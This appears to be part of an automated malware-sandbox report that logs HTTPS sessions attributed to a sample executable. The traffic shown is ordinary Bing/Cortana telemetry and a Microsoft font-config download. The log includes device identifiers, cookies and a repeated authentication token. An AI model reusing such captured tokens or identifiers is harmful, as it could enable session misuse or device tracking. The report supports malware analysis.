                                     2023-01-25 18:44:58 UTC | 50 | OUT | Data Ascii: it","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","EnrichedClientInfo":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","ACVer":"4ef661f2","FDPartnerEntry":"autosuggest","isOffline":0,"webRequested":1,"entryPoint":"WNSST
                                     2023-01-25 18:44:58 UTC | 66 | OUT | Data Ascii: vr></M></Group><Group><M><IG>eb3e080927bc46e297264144745605ad</IG><DS><![CDATA[[{"T":"D.Aggregator","Service":"AutoSuggest","Scenario":"Aggregator","AppNS":"SmartSearch","DS":[],"rankerModelIds":{"fastRankModelId":"STH_8d06f83c-da58-4c02-8fe8-ba2c049d9809
                                     2023-01-25 18:44:58 UTC | 82 | OUT | Data Ascii: cp=7&cvid=3123ef5c085e4e73910c683260128182&ig=648be5f322d1457486a0589b760ca786&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":1595524683385,"UTS":1674704696167,"UxClassification":{"client":"windows"},"Cookies":{"MUID":
                                     2023-01-25 18:44:58 UTC | 87 | IN | HTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: BD055465204E4FDAA19CDA288C73D677 Ref B: FRA31EDGE0505 Ref C: 2023-01-25T18:44:58Z
                                    Date: Wed, 25 Jan 2023 18:44:57 GMT
                                    Connection: close


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                     1 | 192.168.2.3 | 49681 | 204.79.197.200 | 443 | C:\Users\user\Desktop\98j0BL6iLT.exe
                                     Timestamp | kBytes transferred | Direction | Data
                                     2023-01-25 18:45:01 UTC | 88 | OUT | POST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 89890
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                     2023-01-25 18:45:01 UTC | 90 | OUT | Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                     2023-01-25 18:45:01 UTC | 106 | OUT | Data Ascii: :8,"PL":1,"K":21,"RRT":{"CG":26,"MRU":27,"MPP":27,"MST":27,"MFF":27,"IFF":37,"PP":46,"Web":71},"RFT":{"PP":71,"MPP":71,"MST":71,"CG":71},"TRR":[{"V":69,"T":"PP"}],"IRT":{"1001.1T":{"B":49,"E":68,"T":"PP"},"1002.1S":{"B":54,"E":69,"T":"PP"}}}],"STATE":{"We
                                     2023-01-25 18:45:01 UTC | 122 | OUT | Data Ascii: /-1/-1/-1/-1+jm/u//@0/V2%2F2,SWVC//0/@1/-1/-1/-1/-1/-1/-1","TS":1632359204101,"RTS":1523,"SEQ":1,"CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","UTS":1674704701182}]]></D><TS>1632359204101</TS></E><E><T>Event.CIQueueError</T><IG
                                     2023-01-25 18:45:01 UTC | 138 | OUT | Data Ascii: {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\comexp.msc","DName":"Component Services","AppLnch":0,"Args":0,"MDN":0,"Ext":".msc"},"RankerSignals":{"rankingScore":1.37388,"featureStore":{"1":1,"7":9569,"8":1,"10":5,"13":2,"16":9569,"19":1,"42":1,"83":1,"134":13,
                                     2023-01-25 18:45:01 UTC | 154 | OUT | Data Ascii: RTUAL_URL?qry=i&setlang=en-US&cc=US&nohs=1&cp=1&cvid=14ef809469754c3f970ee4803657a8e2&ig=79985700cb8c4126884f296c64860d0c&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":1601477568192,"UTS":1674704701182,"UxClassificati
                                    2023-01-25 18:45:01 UTC170OUTData Raw: 22 3a 22 77 69 6e 64 6f 77 73 22 7d 2c 22 43 6f 6f 6b 69 65 73 22 3a 7b 22 4d 55 49 44 22 3a 22 31 45 31 37 42 39 42 37 30 45 39 42 34 43 36 45 39 35 37 44 31 35 39 45 44 33 36 34 36 46 46 46 22 2c 22 5f 53 53 22 3a 7b 22 43 50 49 44 22 3a 22 31 36 37 34 37 30 34 36 39 31 30 38 37 22 2c 22 41 43 22 3a 22 31 22 2c 22 43 50 48 22 3a 22 34 65 66 36 36 31 66 32 22 7d 7d 7d 5d 5d 3e 3c 2f 44 3e 3c 50 61 67 65 3e 3c 4e 61 6d 65 3e 50 61 67 65 2e 53 6d 61 72 74 53 65 61 72 63 68 2e 41 53 2e 53 75 67 67 65 73 74 69 6f 6e 73 3c 2f 4e 61 6d 65 3e 3c 4c 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 4c 2e 42 6f 78 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 52 65 67 69 6f 6e 22 3a 22 43 6f 72 65 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a
                                    Data Ascii: ":"windows"},"Cookies":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","_SS":{"CPID":"1674704691087","AC":"1","CPH":"4ef661f2"}}}...</D><Page><Name>Page.SmartSearch.AS.Suggestions</Name><L><![CDATA[[{"T":"L.Box","AppNS":"SmartSearch","Region":"Core","L":[{"T":
                                    2023-01-25 18:45:01 UTC178INHTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: A2BF79EF3E4A4022BC6B8A6F2FE46EAB Ref B: FRA31EDGE0209 Ref C: 2023-01-25T18:45:01Z
                                    Date: Wed, 25 Jan 2023 18:45:01 GMT
                                    Connection: close


                                    Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49682 | Destination IP: 204.79.197.200 | Destination Port: 443 | Process: C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Timestamp: 2023-01-25 18:45:07 UTC | kBytes transferred: 179 | Direction: OUT | Data:
                                    POST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 85516
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                    Timestamp: 2023-01-25 18:45:07 UTC | kBytes transferred: 181 | Direction: OUT | Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>88c7f6b4adf343d2bcafd4e30dcea864</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                    Timestamp: 2023-01-25 18:45:07 UTC | kBytes transferred: 197 | Direction: OUT | Data Ascii: bientWidescreen,rs1musicprod,CortanaSPAXamlHeader","UTS":1674704706427}...</D><TS>1632359318176</TS></E><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivo
                                    Timestamp: 2023-01-25 18:45:07 UTC | kBytes transferred: 213 | Direction: OUT | Data Ascii: 6980,"SEQ":14,"UTS":1674704706427}...</D><TS>1632359384912</TS></E><E><T>Event.ClientInst</T><IG>caf0da6ae4aa4d328ea42c79b48981e1</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientW
                                    Timestamp: 2023-01-25 18:45:07 UTC | kBytes transferred: 229 | Direction: OUT | Data Ascii: cprod,CortanaSPAXamlHeader","EnrichedClientInfo":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","ACVer":"4ef661f2","FDPartnerEntry":"autosuggest","isOffline":0,"webRequested":1,"entryPoint":"WNSBOX","previousExperience":"Proactive","deviceHistoryEnabled":1,"w
                                    Timestamp: 2023-01-25 18:45:07 UTC | kBytes transferred: 245 | Direction: OUT | Data Ascii: onUrl":"https://www.bing.com/QF_KEYSTROKE_VIRTUAL_URL?qry=u&setlang=en-US&cc=US&nohs=1&cp=1&cvid=46cc01b77c1a44fa807ea0398d3bcf7d&ig=d223bb7c943e44e2959817884699f164&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":16323
                                    Timestamp: 2023-01-25 18:45:07 UTC | kBytes transferred: 261 | Direction: OUT | Data Ascii: gestions</Name><L><![CDATA[[{"T":"L.Box","AppNS":"SmartSearch","Region":"Core","L":[{"T":"L.Box","Region":"TopHit","L":[{"T":"L.Url","K":"1001.1"}]},{"T":"L.Box","Region":"Groups","L":[{"T":"L.Box","Region":"SearchSuggestions","L":[{"T":"L.Url","K":"114.1
                                    Timestamp: 2023-01-25 18:45:07 UTC | kBytes transferred: 265 | Direction: IN | Data:
                                    HTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: BA59004C61104A848DC175E3D2EE5A0D Ref B: FRA31EDGE0217 Ref C: 2023-01-25T18:45:07Z
                                    Date: Wed, 25 Jan 2023 18:45:06 GMT
                                    Connection: close


                                    Session ID: 3 | Source IP: 192.168.2.3 | Source Port: 49683 | Destination IP: 23.35.236.109 | Destination Port: 443 | Process: C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Timestamp: 2023-01-25 18:45:10 UTC | kBytes transferred: 265 | Direction: OUT | Data:
                                    HEAD /fs/windows/config.json HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    Accept-Encoding: identity
                                    User-Agent: Microsoft BITS/7.8
                                    Host: fs.microsoft.com
                                    Timestamp: 2023-01-25 18:45:10 UTC | kBytes transferred: 265 | Direction: IN | Data:
                                    HTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                    ApiVersion: Distribute 1.1
                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                    x-azure-ref: 20230124T115938Z-f5kzt0nx4h0qp95p604fy089cs000000010000000000epmk
                                    Cache-Control: public, max-age=148434
                                    Date: Wed, 25 Jan 2023 18:45:10 GMT
                                    Connection: close
                                    X-CID: 2


                                    Session ID: 4 | Source IP: 192.168.2.3 | Source Port: 49684 | Destination IP: 23.35.236.109 | Destination Port: 443 | Process: C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Timestamp: 2023-01-25 18:45:10 UTC | kBytes transferred: 266 | Direction: OUT | Data:
                                    GET /fs/windows/config.json HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    Accept-Encoding: identity
                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                    Range: bytes=0-2147483646
                                    User-Agent: Microsoft BITS/7.8
                                    Host: fs.microsoft.com
                                    Timestamp: 2023-01-25 18:45:10 UTC | kBytes transferred: 266 | Direction: IN | Data:
                                    HTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                    ApiVersion: Distribute 1.1
                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                    X-Azure-Ref: 0VeCoYgAAAABR/Z6+30B1RLQsXmQnL8CBTE9OMjFFREdFMDIxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                    Cache-Control: public, max-age=229202
                                    Date: Wed, 25 Jan 2023 18:45:10 GMT
                                    Content-Length: 55
                                    Connection: close
                                    X-CID: 2
                                    Timestamp: 2023-01-25 18:45:10 UTC | kBytes transferred: 266 | Direction: IN | Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                    Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49685 | Destination IP: 204.79.197.200 | Destination Port: 443 | Process: C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Timestamp: 2023-01-25 18:45:12 UTC | kBytes transferred: 267 | Direction: OUT | Data:
                                    POST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 86221
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                    Timestamp: 2023-01-25 18:45:12 UTC | kBytes transferred: 269 | Direction: OUT | Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>a3bcba74866c41808f987e254434c411</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                    Timestamp: 2023-01-25 18:45:12 UTC | kBytes transferred: 285 | Direction: OUT | Data Ascii: 29</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","errorType":"SendTimedOut","failCount":1,"TS":1632409695216,"RTS":35690,"SEQ":27,"
                                    Timestamp: 2023-01-25 18:45:12 UTC | kBytes transferred: 301 | Direction: OUT | Data Ascii: 61057</TS></E><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.QFPerfPing","ST":"AppCache","CVID":"26187249ee934ff082486f15de489db7","OFF
                                    Timestamp: 2023-01-25 18:45:12 UTC | kBytes transferred: 317 | Direction: OUT | Data Ascii: tcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","EnrichedClientInfo":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","ACVer":"4ef661f2","FDPartnerEntry":"autosuggest","isOffline":0,"webRequested":1,"entryPoint":"WNSBOX","previousExperience":"P
                                    Timestamp: 2023-01-25 18:45:12 UTC | kBytes transferred: 333 | Direction: OUT | Data Ascii: ice":"AutoSuggest","Scenario":"NonSuggestions","SC":1,"DS":[{"T":"D.Url","K":114,"Q":"uac","Val":"SW","Ho":0,"Gr":11,"NR":1,"RankerSignals":{"rankingScore":-11.44236,"featureStore":{"4":1,"7":1,"10":3,"19":1,"25":1,"42":1,"59":1,"133":1,"136":1,"137":3,"1
                                    Timestamp: 2023-01-25 18:45:12 UTC | kBytes transferred: 349 | Direction: OUT | Data Ascii: "/><requestInfo key="IsQuery" value="false"/><requestInfo key="Form" value=""/><userInfo key="AppName" value="SmartSearch"/></Ovr></M></Group><Group><M><IG>53edd59d00f145bd8efd09ad321b52ea</IG><DS><![CDATA[[]...</DS><D><![CDATA[{"CurUrl":"https://www.bing
                                    Timestamp: 2023-01-25 18:45:12 UTC | kBytes transferred: 353 | Direction: IN | Data:
                                    HTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: FD1D5EBBAE7A4740B6856028FD08131D Ref B: FRA31EDGE0521 Ref C: 2023-01-25T18:45:12Z
                                    Date: Wed, 25 Jan 2023 18:45:12 GMT
                                    Connection: close


                                    Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49686 | Destination IP: 204.79.197.200 | Destination Port: 443 | Process: C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Timestamp: 2023-01-25 18:46:25 UTC | kBytes transferred: 354 | Direction: OUT | Data:
                                    POST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
